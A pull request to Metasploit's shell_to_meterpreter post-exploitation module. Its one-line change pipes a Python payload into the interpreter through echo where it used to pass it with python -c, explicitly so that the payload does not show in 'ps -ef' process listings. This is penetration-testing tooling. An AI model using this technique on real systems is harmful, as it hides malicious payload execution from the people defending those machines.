### PR TITLE
change python invocation in sessions -u

### DIFF
--- a/modules/post/multi/manage/shell_to_meterpreter.rb
+++ b/modules/post/multi/manage/shell_to_meterpreter.rb
@@ -174,7 +174,7 @@ class MetasploitModule < Msf::Post
       end
     when 'python'
       vprint_status("Transfer method: Python")
-      cmd_exec("python -c \"#{payload_data}\"")
+      cmd_exec("echo \"#{payload_data}\" | python")
     else
       vprint_status("Transfer method: Bourne shell [fallback]")
       exe = Msf::Util::EXE.to_executable(framework, larch, lplat, payload_data)


### PR DESCRIPTION
Quick fix for `sessions -u` so that it calls python by piping the command into it, instead of using python -c.
I'm aware this doesn't work on Windows, so I only changed it in this one instance.
Under Linux/OSX calling python in this way is better because the command does not show up when you do `ps -ef`

